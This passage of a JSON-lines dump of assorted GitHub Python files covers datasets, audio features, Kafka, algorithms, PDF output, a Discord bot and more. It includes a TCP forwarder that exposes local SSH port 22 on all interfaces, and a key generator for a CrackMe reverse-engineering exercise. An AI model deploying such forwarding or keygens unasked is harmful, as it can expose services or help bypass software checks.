path to where the dataset is downloaded locally.\n \"\"\"\n ensure_opencv_version_ok()\n\n local_recording_dir = find_path_if_downloaded(recording_name, dataset_dir)\n if local_recording_dir is not None:\n return local_recording_dir\n\n recording_id = get_recording_id_from_name(recording_name)\n local_recording_dir = dataset_dir / recording_id\n recording_url = f\"{DATASET_BASE_URL}/videos/{recording_id}\"\n\n ensure_downloaded(f\"{recording_url}/{VIDEO_FILENAME}\", local_recording_dir / VIDEO_FILENAME)\n ensure_downloaded(f\"{recording_url}/{GEOMETRY_FILENAME}\", local_recording_dir / GEOMETRY_FILENAME)\n ensure_downloaded(\n f\"{DATASET_BASE_URL}/annotations/{recording_id}.pbdata\", local_recording_dir / ANNOTATIONS_FILENAME\n )\n\n return local_recording_dir\n\n\ndef ensure_video_is_split_into_frames(recording_dir: Path, force_reprocess: bool = False) -> None:\n video_path = recording_dir / VIDEO_FILENAME\n frames_dir = recording_dir / \"video\"\n if force_reprocess or not frames_dir.exists():\n logging.info(\"Splitting video at %s into frames in %s\", video_path, frames_dir)\n os.makedirs(frames_dir, exist_ok=True)\n\n vidcap = cv2.VideoCapture(str(video_path))\n success, image = vidcap.read()\n count = 0\n while success:\n cv2.imwrite(f\"{frames_dir}/{count}.jpg\", image)\n success, image = vidcap.read()\n count += 1\n\n\ndef ensure_recording_available(name: str, local_dataset_dir: Path, force_reprocess_video: bool = False) -> Path:\n recording_path = ensure_recording_downloaded(name, local_dataset_dir)\n ensure_video_is_split_into_frames(recording_path, force_reprocess_video)\n return 
recording_path\n","repo_name":"rerun-io/rerun","sub_path":"examples/python/objectron/download_dataset.py","file_name":"download_dataset.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","stars":3502,"dataset":"github-code","pt":"38"} +{"seq_id":"5534011403","text":"# -*- coding: utf-8 -*-\n# tcp mapping created by wxk at 2021-12-7\n\nimport sys\nimport socket\nimport logging\nimport threading\n\n\n# Port mapping configuration\nCFG_REMOTE_IP = '127.0.0.1'\nCFG_REMOTE_PORT = 22\nCFG_LOCAL_IP = '0.0.0.0'\nCFG_LOCAL_PORT = 10086\n\n# Size of the receive buffer\nPKT_BUFF_SIZE = 2048\n\nlogger = logging.getLogger(\"Proxy Logging\")\nformatter = logging.Formatter('%(name)-12s %(asctime)s %(levelname)-8s %(lineno)-4d %(message)s', '%Y %b %d %a %H:%M:%S',)\n\nstream_handler = logging.StreamHandler(sys.stderr)\nstream_handler.setFormatter(formatter)\nlogger.addHandler(stream_handler)\n\nlogger.setLevel(logging.DEBUG)\n\n# One-way stream data forwarding\ndef tcp_mapping_worker(conn_receiver, conn_sender):\n    while True:\n        try:\n            data = conn_receiver.recv(PKT_BUFF_SIZE)\n        except Exception:\n            logger.debug('Connection closed.')\n            break\n\n        if not data:\n            logger.info('No more data is received.')\n            break\n\n        try:\n            conn_sender.sendall(data)\n        except Exception:\n            logger.error('Failed sending data.')\n            break\n\n        # logger.info('Mapping data > %s ' % repr(data))\n        logger.info('Mapping > %s -> %s > %d bytes.' % (conn_receiver.getpeername(), conn_sender.getpeername(), len(data)))\n\n    conn_receiver.close()\n    conn_sender.close()\n\n    return\n\n# Handle a port mapping request\ndef tcp_mapping_request(local_conn, remote_ip, remote_port):\n    remote_conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n    try:\n        remote_conn.connect((remote_ip, remote_port))\n    except Exception:\n        local_conn.close()\n        logger.error('Unable to connect to the remote server.')\n        return\n\n    # Calling the workers directly does not work; why would it block?\n    # tcp_mapping_worker(local_conn, remote_conn)\n    # tcp_mapping_worker(remote_conn, local_conn)\n\n    threading.Thread(target=tcp_mapping_worker, args=(local_conn, remote_conn)).start()\n    threading.Thread(target=tcp_mapping_worker, args=(remote_conn, local_conn)).start()\n\n    return\n\n# Port mapping service loop\ndef tcp_mapping(remote_ip, remote_port, local_ip, local_port):\n    local_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    local_server.bind((local_ip, local_port))\n    local_server.listen(5)\n\n    logger.debug('Starting mapping service on ' + local_ip + ':' + str(local_port) + ' ...')\n\n    while True:\n        try:\n            (local_conn, local_addr) = local_server.accept()\n        except Exception:\n            local_server.close()\n            logger.debug('Stop mapping service.')\n            break\n\n        threading.Thread(target=tcp_mapping_request, args=(local_conn, remote_ip, remote_port)).start()\n\n        logger.debug('Receive mapping request from %s:%d.' 
% local_addr)\n\n    return\n\n# Main entry point\nif __name__ == '__main__':\n    tcp_mapping(CFG_REMOTE_IP, CFG_REMOTE_PORT, CFG_LOCAL_IP, CFG_LOCAL_PORT)","repo_name":"xk-wang/myfrp","sub_path":"pytest/frpctest.py","file_name":"frpctest.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"38"} +{"seq_id":"5533801583","text":"# flake8: noqa\nimport os.path as osp\nimport pathlib\n\nfrom yanerf.utils.config import Config\nfrom yanerf.utils.registry import Registry\n\nTRAINER = Registry(\"Trainer\")\n\n\n@TRAINER.register_module()\nclass MyTrainer:\n    def __init__(self, lr: int, epochs: int) -> None:\n        self.lr = lr\n        self.epochs = epochs\n\n\ndef test_builder():\n    cfg = Config.fromfile(osp.join(osp.dirname(__file__), \"configs/test_utils_config.yml\"))\n    trainer = TRAINER.build(cfg.trainer)\n    print(f\"\\nMY CFG: {cfg.pretty_text}\")\n    print(trainer.__dict__)\n","repo_name":"xk-huang/yet-another-nerf","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"} +{"seq_id":"9191816978","text":"from snakemake.utils import read_job_properties\nimport sys\nimport subprocess as sp\nimport json\ncluster_json_file = sys.argv[1]\njobscript = sys.argv[2]\ncustom_config_rules = ['job_to_bundle']\nwith open(cluster_json_file) as j:\n    cluster_json = json.load(j)\n#%%\n\nparams = cluster_json['__default__']\njob_properties = read_job_properties(jobscript)\nrule = job_properties['rule']\nif rule in cluster_json:\n    for key in cluster_json[rule]:\n        params[key] = cluster_json[rule][key]\nelif rule in custom_config_rules:\n    # specify custom configurations for specific rules\n    print(rule)\n    if rule == 'job_to_bundle':\n        print(job_properties)\n        if job_properties['wildcards']['wc'] == 'Q':\n            params = cluster_json['__default__']\n        else:\n            outdir = 'script_temp'\n            ec_strings = [f\"{key}={job_properties['wildcards'][key]}\" for key in job_properties['wildcards']]\n            ec_strings = '-'.join(ec_strings)\n            output = f'{ec_strings}.{rule}.sh'\n            sp.run(f\"grep -v '#!/bin/sh' {jobscript} > {outdir}/{output}\", shell=True)\n            sys.exit()\n\nelse:  # use default parameters\n    params = cluster_json['__default__']\n\nsbcmd = f'''sbatch --cpus-per-task={params['cpus-per-task']} \\\n    --mem={params['mem']} \\\n    --time={params['time']} \\\n    --job-name={rule} \\\n    --partition={params['partition']} \\\n    --output=00log/{rule}.out \\\n    --error=00log/{rule}.err \\\n    {params['extra']} \\\n    {jobscript}\n\n'''\nsp.run(sbcmd, shell=True)\n\n\n","repo_name":"vinay-swamy/Snakemake-Horizontal-RuleGroup","sub_path":"cluster-config.py","file_name":"cluster-config.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"42602892030","text":"# Shortest-job-first disk scheduling: returns the average turnaround time.\ndef solution(jobs):\n    cnt = 0\n    time = 0\n    realtime = 0\n    que = []\n    x = len(jobs)\n    jobs.sort(key=lambda x: x[0])  # sort jobs by arrival time\n\n    while cnt < x:\n\n        # move every job that has arrived by now into the waiting queue\n        while jobs and jobs[0][0] <= time:\n            a, b = jobs.pop(0)\n            que.append([a, b])\n            que.sort(key=lambda x: x[1])  # keep the shortest job first\n        if que:\n            # run the shortest waiting job and record its turnaround time\n            c, d = que.pop(0)\n            time += d\n            realtime += time - c\n            cnt += 1\n        else:\n            # no job available yet; advance the clock\n            time += 1\n\n    answer = realtime // x\n\n    return answer\n\nprint(solution([[0, 3], [1, 9], [2, 6]]))","repo_name":"kimss373/solvealgorithm","sub_path":"프로그래머스/디스크 컨트롤러.py","file_name":"디스크 
컨트롤러.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12904245629","text":"from kafka import KafkaConsumer\nimport json\n\n\nclass ConsumerServer(KafkaConsumer):\n def __init__(self, topic_name):\n self.consumer = KafkaConsumer(\n bootstrap_servers=\"localhost:9092\",\n request_timeout_ms=1000,\n auto_offset_reset=\"earliest\",\n max_poll_records=10\n )\n self.consumer.subscribe(topics=topic_name)\n\n def consume(self):\n while True:\n for metadata, consumer_record in self.consumer.poll().items():\n if consumer_record is not None:\n for record in consumer_record:\n print(json.loads(record.value))\n else:\n print(\"no message\")\n\n\nif __name__ == \"__main__\":\n consumer = ConsumerServer(\"calls\")\n consumer.consume()","repo_name":"amaralunao/SF-Crime-Statistics","sub_path":"consumer_server.py","file_name":"consumer_server.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"13466818863","text":"from typing import List\nfrom bisect import bisect_right\nfrom collections import deque\n\n\ndef main():\n def findClosestElements(arr: List[int], k: int, x: int) -> List[int]:\n index = bisect_right(arr, x)\n left, right = index - 1, index\n res = deque()\n for _ in range(k):\n left_val = x - arr[left] if 0 <= left < len(arr) else float('inf')\n right_val = arr[right] - x if 0 <= right < len(arr) else float('inf')\n if left_val <= right_val:\n res.appendleft(arr[left])\n left -= 1\n else:\n res.append(arr[right])\n right += 1\n return list(res)\n\n arr = [1, 2, 3, 4, 5]\n k, x = 4, 3\n print(findClosestElements(arr, k, x))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sanchit-g/DSA-practice-codes","sub_path":"k_closest_elements.py","file_name":"k_closest_elements.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21023241221","text":"import librosa\nimport librosa.display\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport os\nimport pandas as pd\nimport random\n\nmatplotlib.use('Agg')\n\nclass Loader:\n\n def __init__(self, sample_rate, mono): # offset being time_start and duration is the window_size(seconds)\n self.sample_rate = sample_rate\n self.mono = mono\n\n def load(self, file_path, offset, time_end):\n duration = time_end - offset\n signal, sr = librosa.load(file_path, offset=offset, duration=duration, mono=self.mono, res_type=\"kaiser_fast\")\n return signal, sr\n \n def get_sample(self, signal, offset, time_end, original_sample_rate):\n offset_samples = offset * original_sample_rate\n duration_samples = (time_end - offset) * original_sample_rate\n return signal[offset_samples:offset_samples + duration_samples]\n \n def resample(self, signal, original_sr):\n if self.sample_rate != original_sr:\n signal = librosa.resample(signal, original_sr, self.sample_rate, res_type=\"kaiser_best\")\n return signal\n\nclass Padder: #\n def __init__(self, num_expected_samples, mode = \"constant\"):\n self.num_expected_samples = num_expected_samples\n self.mode = mode\n\n def is_padding_needed(self, len_arr):\n return True if self.num_expected_samples > len_arr else False\n\n def pad(self, array): # padding on the end of the original array\n if self.is_padding_needed(len(array)):\n num_missing_samples = self.num_expected_samples - len(array)\n array = 
np.pad(array, (0, num_missing_samples), mode=self.mode)\n return array\n\n\nclass MelSpecExtractor:\n\n def __init__(self, sample_rate):\n self.sample_rate = sample_rate\n\n def extract(self, signal):\n mel_signal = librosa.feature.melspectrogram(y=signal, sr=self.sample_rate)[:-1]\n spectogram = np.abs(mel_signal)\n log_spec = librosa.amplitude_to_db(spectogram, ref = np.max)\n return log_spec\n\nclass MFCCExtractor:\n\n def __init__(self, sample_rate):\n self.sample_rate = sample_rate\n\n def extract(self, signal):\n mfccs_features = librosa.feature.mfcc(y=signal, sr=self.sample_rate, n_mfcc=40)\n #in order to find out scaled feature we do mean of transpose of value\n return mfccs_features\n\nclass Saver:\n\n def __init__(self, feature_save_dir):\n self.feature_save_dir = feature_save_dir\n\n def save_feature(self, feature, file_path, offset, time, label,type):\n save_path = self._generate_save_path(file_path, label, offset, time, type)\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.axes.get_xaxis().set_visible(False)\n ax.axes.get_yaxis().set_visible(False)\n ax.set_frame_on(False)\n librosa.display.specshow(feature, x_axis=\"time\", y_axis=\"mel\")\n plt.savefig(save_path, bbox_inches='tight', pad_inches = 0)\n plt.clf()\n plt.close(\"all\")\n\n def _generate_save_path(self, file_path, label, offset, time, type):\n ending_str = \"_{}_{}\".format(offset, time)\n file_name = os.path.split(file_path)[1][:-4]\n #save_path = self.feature_save_dir+ type+ label +\"/\" + file_name + ending_str + \"_augmented.png\"\n save_path = file_name + ending_str + \"_augmented.png\"\n return save_path\n\n\n\nclass DataAugmentation:\n\n def __init__(self, sr):\n self.sr = sr\n \n\n def add_white_noise(self, signal, noise_percentage_factor = 0.1):\n noise = np.random.normal(0, signal.std(), signal.size)\n augmented_signal = signal + noise * noise_percentage_factor\n return augmented_signal\n \n def random_gain(self, signal, min_factor=0.1, max_factor=0.12):\n gain_rate = random.uniform(min_factor, max_factor)\n augmented_signal = signal * gain_rate\n return augmented_signal\n \n def time_strecth(self, signal, strech_rate = 0.4):\n return librosa.effects.time_stretch(signal, strech_rate)\n \n def pitch_scale(self, signal, num_semitones = 2):\n return librosa.effects.pitch_shift(signal, self.sr, num_semitones)\n\nclass MinMaxNormaliser:\n\n def __init__(self, min_val, max_val):\n self.min = min_val\n self.max = max_val\n\n def normalise(self, array):\n a = (array - array.min())\n b = (array.max() - array.min())\n norm_array = np.divide(a, b, out=np.zeros_like(a), where=b!=0)\n norm_array = norm_array * (self.max - self.min) + self.min\n return norm_array\n\nclass PreProcessingPipeline:\n\n def __init__(self, loader, padder, feature_extractor, saver, normaliser, data_augmentation):\n self.loader = loader\n self.padder = padder\n self.feature_extractor = feature_extractor\n self.normaliser = normaliser\n self.saver = saver\n self.data_augmentation = data_augmentation\n self.current_file = None\n self.current_signal = None\n self.current_sr = None\n\n def _process_file(self, file_path, offset, time_end,label, type):\n signal,sr = self.loader.load(file_path, offset, time_end)\n signal = self.loader.resample(signal, sr)\n signal = self.padder.pad(signal)\n augmentation = random.randint(0,1)\n feature_orig = self.feature_extractor.extract(signal)\n feature_orig = self.normaliser.normalise(feature_orig)\n feature_pitch = self.feature_extractor.extract(self.data_augmentation.pitch_scale(signal))\n 
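A two-line check of the `np.pad` call that `Padder` uses above, with toy values I assume for illustration (five samples padded out to an expected eight):

import numpy as np

arr = np.arange(5)
padded = np.pad(arr, (0, 8 - len(arr)), mode="constant")  # zero-pad on the right
assert padded.tolist() == [0, 1, 2, 3, 4, 0, 0, 0]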
feature_pitch = self.normaliser.normalise(feature_pitch)\n feature_time_streched = self.feature_extractor.extract(self.data_augmentation.time_strecth(signal))\n feature_time_streched = self.normaliser.normalise(feature_time_streched)\n return feature_orig, feature_pitch, feature_time_streched\n # if augmentation == 0:\n # signal = self.data_augmentation.pitch_scale(signal)\n # else:\n # signal = self.data_augmentation.add_white_noise(signal)\n \n # feature = self.feature_extractor.extract(signal)\n # feature = self.normaliser.normalise(feature)\n #feature = feature[..., np.newaxis]\n #self.saver.save_feature(feature, file_path, offset, time_end, label, type)\n\n def process(self, dataframe, type):\n for row in dataframe.itertuples():\n try:\n self._process_file(row.File_path, row.Time_start, row.Time_end, row.Label, type)\n except:\n print(row.File_path, row.Time_start, row.Time_end)\n continue\n\n\nif __name__ == \"__main__\":\n DURATION = 3\n SAMPLE_RATE = 22050\n NUM_EXPECTED_SAMPLES = DURATION * SAMPLE_RATE\n MONO = True\n\n FEATURE_SAVE_DIR = \"mel_augment/\"\n RANDOM_FILE = r\"D:\\Projects\\DL_Violence_Pytorch\\fs\\datasets\\av\\dataset_main\\Hanau02\\i3\\Hanau02_i3_026_center_top_wav_audio_ros.wav\"\n\n \n loader = Loader(SAMPLE_RATE, MONO)\n padder = Padder(NUM_EXPECTED_SAMPLES)\n mel_extractor = MelSpecExtractor(SAMPLE_RATE)\n min_max_normaliser = MinMaxNormaliser(0, 1)\n mfcc_extractor = MFCCExtractor(SAMPLE_RATE)\n saver = Saver(FEATURE_SAVE_DIR)\n data_augmentation = DataAugmentation(SAMPLE_RATE)\n pipeline = PreProcessingPipeline(loader, padder, mel_extractor, saver, min_max_normaliser, data_augmentation)\n #feature = pipeline._process_file(RANDOM_FILE, 52, \"violent\", \"training/\")\n\n","repo_name":"EduardoGit-1/DL-based-algorithm-for-violence-detection-in-audio-data","sub_path":"additional_tests/mel_augment/mel.py","file_name":"mel.py","file_ext":"py","file_size_in_byte":7360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"3699361526","text":"from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer\nfrom reportlab.lib.styles import getSampleStyleSheet\nfrom reportlab.lib.units import inch\nfrom reportlab.lib.pagesizes import A4\n\n\nstyles = getSampleStyleSheet()\n\nTitle = \"Hello World\"\npageinfo = \"Page\"\n\n\ndef myfirstpage(canvas, doc):\n canvas.saveState()\n canvas.setFont(psfontname=\"Times-Bold\", size=16)\n canvas.drawCentredString(x=3*inch, y=10*inch, text=Title)\n canvas.setFont(psfontname=\"Times-Roman\", size=9)\n canvas.drawString(x=1*inch, y=0.75*inch, text=\"Introduction\")\n canvas.restoreState()\n\n\ndef mylaterpages(canvas, doc):\n canvas.saveState()\n canvas.setFont(psfontname=\"Times-Roman\", size=9)\n canvas.drawString(x=1*inch, y=0.75*inch, text=pageinfo)\n canvas.drawString(x=1.5*inch, y=0.75*inch, text=str(canvas.getPageNumber()))\n canvas.restoreState()\n\n\ndef go():\n doc = SimpleDocTemplate(filename=\"platypus_intro.pdf\", pagesize=A4, title=\"List\")\n story = [Spacer(1, 2*inch)]\n style = styles[\"Normal\"]\n for i in range(20):\n bogustext = (\"This is Paragraph number %s \" % i) * 10\n paragrafo = Paragraph(bogustext, style)\n story.append(paragrafo)\n story.append(Spacer(width=1, height=0.2*inch))\n\n doc.build(flowables=story, onFirstPage=myfirstpage, onLaterPages=mylaterpages)\n\n return doc\n\n\nif __name__ == '__main__':\n 
go()\n","repo_name":"jeancharlles/reportpdf","sub_path":"platypus/platypus_intro.py","file_name":"platypus_intro.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18239540447","text":"#!/usr/bin/python\n#standard imports\nimport sys\n\nk = int(sys.argv[1]) #read first input as k size of kmers\nwith open(sys.argv[2]) as f: #read input file, remove new line character and concatenate lines\n file = \"\".join(line.strip() for line in f.readlines()[1:])\nkmers, bases = list(), tuple(list('ATGC'))\ndef generate_kmers(dna_tup: tuple, kmers: list, k: int)-> dict:\n \"\"\" method to generate all possible combinations of kmers from dna bases\n :param dna_tup: tuple of dna bases\n :param kmers: a list containing combinations\n :param k: k-mer size from user input\n :return: k-mer combinations dictionary\n \"\"\"\n while k:\n kmers = [i + list(j) for i in kmers for j in dna_tup]\n return generate_kmers(dna_tup=dna_tup, kmers=kmers, k=k-1)\n return dict.fromkeys([''.join(x) for x in kmers],0)\nkmer_dict = generate_kmers(dna_tup=bases, kmers=[kmers], k=k) #create dictionary with kmers as keys\nfor key in kmer_dict.keys(): #to find number of occurrences of kmers in fasta read file, insert as values to dict\n if key in file: kmer_dict[key] = sum([1 for i in range(0,len(file)-len(key)+1) if file[i:i+len(key)] == key ])\n[print(key,'\\t',kmer_dict[key]) for key in sorted(kmer_dict.keys()) if kmer_dict[key]][0] #print stdout","repo_name":"rbr7/bioinformatics_courses","sub_path":"prog_bioinformatics/solved_bioinfo_algos/kmer_counter.py","file_name":"kmer_counter.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"71744951150","text":"from math import sqrt\r\nfrom sympy import *\r\nfrom tkinter import Tk, Label, Button, Entry, Frame\r\n\r\nclass Uncert_Calc:\r\n def __init__(self, master):\r\n self.master = master\r\n master.title('Uncertainty Propagation Calc')\r\n master.iconbitmap('favicon.ico')\r\n\r\n self.frame = Frame()\r\n self.frame.grid(padx=20, pady=20)\r\n\r\n #instantiate widgets\r\n self.formula_label = Label(self.frame, text='Enter Formula: ')\r\n self.formula_entry = Entry(self.frame)\r\n self.submit_formula = Button(self.frame, text='Continue', command=self.generateEntries)\r\n \r\n self.answer_label = Label(self.frame, text='')\r\n\r\n #show widgets\r\n self.formula_label.grid(row=0)\r\n self.formula_entry.grid(row=0, column=1)\r\n self.submit_formula.grid(row=0, column=2, padx=10)\r\n\r\n self.variables = [] #symbols in function\r\n self.values = [] #values of the symbols\r\n self.uncertainties = [] #uncertainties of those values\r\n self.subsitutions = [] #for subs() sympy function\r\n self.entries = [] #generated entries\r\n #special functions\r\n self.special_2 = ('ln')\r\n self.special_3 = ('cos','sin','tan','sec','csc','cot','log')\r\n self.special_4 = ('acos','asin','atan','asec','acsc','acot')\r\n\r\n def generateEntries(self):\r\n #clear any existing entries, and the rest of the lists\r\n del self.entries[:]\r\n del self.variables[:]\r\n del self.values[:]\r\n del self.uncertainties[:]\r\n del self.subsitutions[:]\r\n \r\n for widget in self.frame.grid_slaves(): #grid_slaves() returns all widgets in grid\r\n if int(widget.grid_info()['row']) > 0:\r\n widget.grid_forget()\r\n\r\n #get formula\r\n funct = self.formula_entry.get()\r\n i = 0\r\n while i < len(funct): #determine 
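The k-mer counter above pre-generates all 4**k possible keys and then rescans the file once per key; a simpler sketch (my own, not the record's method) counts only the k-mers that actually occur, in one pass:

from collections import Counter

def count_kmers(seq: str, k: int) -> Counter:
    # One sliding window over the sequence; O(len(seq) * k) overall.
    return Counter(seq[i:i + k] for i in range(len(seq) - k + 1))

assert count_kmers("ATATA", 3) == Counter({"ATA": 2, "TAT": 1})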
variables in function\r\n if funct[i:i+2] in self.special_2:\r\n i+=2\r\n elif funct[i:i+3] in self.special_3:\r\n i+=3\r\n elif funct[i:i+4] in self.special_4:\r\n i+=4\r\n if funct[i].isalpha() and funct[i] not in self.variables:\r\n self.variables.append(funct[i])\r\n i+=1\r\n \r\n #create entries\r\n i=1 #row number\r\n for variable in self.variables: #set variables as symbols in sympy, create values and uncertanties list\r\n var(variable)\r\n Label(self.frame, text=\"Enter the value and uncertainty for '\" + variable +\"': '\").grid(row=i)\r\n entry = Entry(self.frame)\r\n entry.grid(row=i, column=1)\r\n self.entries.append(entry)\r\n i+=1\r\n \r\n #submit button and view answer\r\n submit = Button(self.frame,text='Submit',command=lambda: self.calcUncert(funct))\r\n submit.grid(row=i,padx=10,pady=10)\r\n\r\n def calcUncert(self,f):\r\n funct = f\r\n sumR = 0\r\n \r\n del self.uncertainties[:]\r\n del self.values[:]\r\n \r\n for entry in self.entries:\r\n val_uncert=entry.get().split()\r\n self.values.append(float(val_uncert[0]))\r\n self.uncertainties.append(float(val_uncert[1]))\r\n\r\n for j in range(len(self.variables)): #create subsitutions list\r\n self.subsitutions.append((self.variables[j], self.values[j]))\r\n for i in range(0,len(self.values)): #calculate propogated uncertainty\r\n sumR += (diff(funct, self.variables[i]).subs(self.subsitutions) * self.uncertainties[i])**2\r\n result = sympify(funct).subs(self.subsitutions)\r\n self.answer_label['text'] = 'Answer: ' + str(round(result,3)) + ' +/- ' + str(round(sqrt(sumR),3))\r\n self.answer_label.grid(row=self.frame.grid_size()[1]-1, column=1)\r\n\r\n#run gui \r\nroot = Tk()\r\ngui = Uncert_Calc(root)\r\nroot.mainloop()\r\n","repo_name":"igullickson/PyUncertaintyCalc","sub_path":"main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22496799005","text":"import random\n\ndef keygen():\n key_list = []\n while True:\n #Try to get a good mix of short and long numbers for variety.\n mix = random.randint(1,100)\n if mix % 2 == 0:\n n = random.randint(100,1000)\n else:\n n = random.randint(100000,900000)\n \n isPrime = True\n\n #Check to see if any other number will divide evenly.\n for num in range(2, n):\n if n % num == 0:\n isPrime = False\n break\n\n #Check to see if its prime and length modulo 3 equals 0. 
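Outside the GUI, the propagation rule the calculator implements, sigma_f = sqrt(sum((df/dx_i * sigma_i)**2)), fits in a few lines of sympy; the formula and numbers below are illustrative assumptions of mine, not values from the record:

from sympy import symbols, diff, sqrt, sympify

def propagate(expr_str, values, uncerts):
    expr = sympify(expr_str)
    subs = list(values.items())
    # Sum the squared partial-derivative contributions of each uncertain input.
    variance = sum((diff(expr, s).subs(subs) * u) ** 2 for s, u in uncerts.items())
    return expr.subs(subs), sqrt(variance)

x, y = symbols("x y")
value, sigma = propagate("x*y", {x: 2.0, y: 3.0}, {x: 0.1, y: 0.2})
print(value, sigma)  # 6.0 +/- 0.5, since (3*0.1)**2 + (2*0.2)**2 = 0.25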
\n if isPrime and (len(str(n)) % 3 == 0):\n key_list.append(n)\n\n #Just generate 10 of these.\n if len(key_list) == 10:\n break\n return key_list\n\nkey_list = keygen()\n\nprint('Generated Keys (10): ')\n\nfor p in key_list:\n print(p)\n","repo_name":"xd43D41U5x/CrackMe_Challenges","sub_path":"week_6/keygen.py","file_name":"keygen.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"6280368196","text":"# exercise 2: calculate body mass index\nweight = input(\"enter your weight in kg: \")\nheight = input(\"enter your height in m: \")\n\nfbmi = float(weight) / (float(height) ** 2)\nibmi = round(fbmi, 2)\n\nprint(f\"Your BMI is {ibmi} \")\n\nif ibmi <= 18.5:\n print(\"You are UNDERWEIGHT.\")\nelif ibmi <= 25:\n print(\"You are NORMAL WEIGHT.\")\nelif ibmi <= 30:\n print(\"You are OVERWEIGHT.\")\nelif ibmi <= 35:\n print(\"You are OBESE.\")\nelse:\n print(\"You are CLINICALLY OBESE.\")","repo_name":"tasha-olivia/pythonCourse","sub_path":"python 100/day 2/exercise2_bmi.py","file_name":"exercise2_bmi.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"690994641","text":"from typing import Union\n\nfrom classes.response import InteractionResponse, InteractionCallbackData, InteractionCallbackType, InteractionCallbackDataFlags\n\nfrom classes.member import Member\nfrom classes.user import User\n\nfrom classes.components import ActionRow, Button, SelectMenu\n\n\nclass Context:\n def __init__(self, interaction_type, http, interaction):\n self._acked = False\n\n self.type = interaction_type\n\n self.http = http\n self.interaction = interaction\n self.interaction_id = int(interaction['id'])\n self.application_id = int(interaction['application_id'])\n self.interaction_token = interaction['token']\n\n @property\n def guild_id(self) -> int:\n return int(self.interaction['guild_id']) if 'guild_id' in self.interaction else None\n\n @property\n def channel_id(self) -> int:\n return int(self.interaction['channel_id']) if 'channel_id' in self.interaction else None\n\n @property\n def author(self) -> Union[Member, User]:\n return Member(self.interaction['member']) if 'member' in self.interaction else User(self.interaction['user'])\n\n @property\n def message(self) -> dict:\n return self.interaction['message'] if 'message' in self.interaction else None\n\n async def respond(self, content=None, embeds=None, ephemeral=False, components=None):\n if ephemeral:\n ephemeral = InteractionCallbackDataFlags.EPHEMERAL.value\n else:\n ephemeral = 0\n if components:\n if isinstance(components, ActionRow):\n components = [components.to_json()]\n elif isinstance(components, Button) or isinstance(components, SelectMenu):\n row = ActionRow()\n row.add_components(components)\n components = [row]\n else:\n rows = []\n row = ActionRow()\n for i, component in enumerate(components):\n if i % 5 == 0 and i != 0:\n rows.append(row)\n row = ActionRow()\n row.add_components(component)\n components = rows\n data = InteractionCallbackData(content=content, embeds=embeds, flags=ephemeral, components=components)\n if self.type == 2:\n if not self._acked:\n return InteractionResponse(InteractionCallbackType.CHANNEL_MESSAGE_WITH_SOURCE, data)\n else:\n await self.http.request('POST', f'/webhooks/{self.application_id}/{self.interaction_token}', json=data)\n elif self.type == 3:\n if not self._acked:\n return 
InteractionResponse(InteractionCallbackType.UPDATE_MESSAGE, data)\n else:\n await self.http.request('PATCH', f'/webhooks/{self.application_id}/{self.interaction_token}/messages/@original', json=data.to_json())\n","repo_name":"random-duk/ducky-interactions","sub_path":"classes/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34526349885","text":"import sys\r\n\r\nN,K=map(int,sys.stdin.readline().split())\r\n\r\ninputs=sys.stdin.readline().strip()\r\n\r\narr=[]\r\n\r\nfor ch in inputs:\r\n if ch == 'H':\r\n arr.append(False)\r\n else:\r\n arr.append(True)\r\n# print(inputs)\r\n# print(arr)\r\n\r\ncnt=0\r\nfor i in range(len(inputs)):\r\n if inputs[i]=='H':\r\n for idx in range(max(i-K,0),min(i+K+1,len(inputs))):\r\n if arr[idx]==True:\r\n arr[idx]=False\r\n cnt+=1\r\n break\r\n\r\n\r\nprint(cnt)\r\n","repo_name":"hyun132/Algorithm_with_python","sub_path":"햄버거 분배.py","file_name":"햄버거 분배.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22779550448","text":"import matplotlib.pyplot as plt\nimport matplotlib.colors as colors\nfrom mpl_toolkits.axes_grid1.axes_divider import make_axes_locatable\nfrom mpl_toolkits.axes_grid1.colorbar import colorbar\n\nimport numpy as np\nfrom scipy import ndimage\n\nfrom coolbox.utilities import (\n GenomeRange,\n change_chrom_names,\n get_logger\n)\n\nfrom 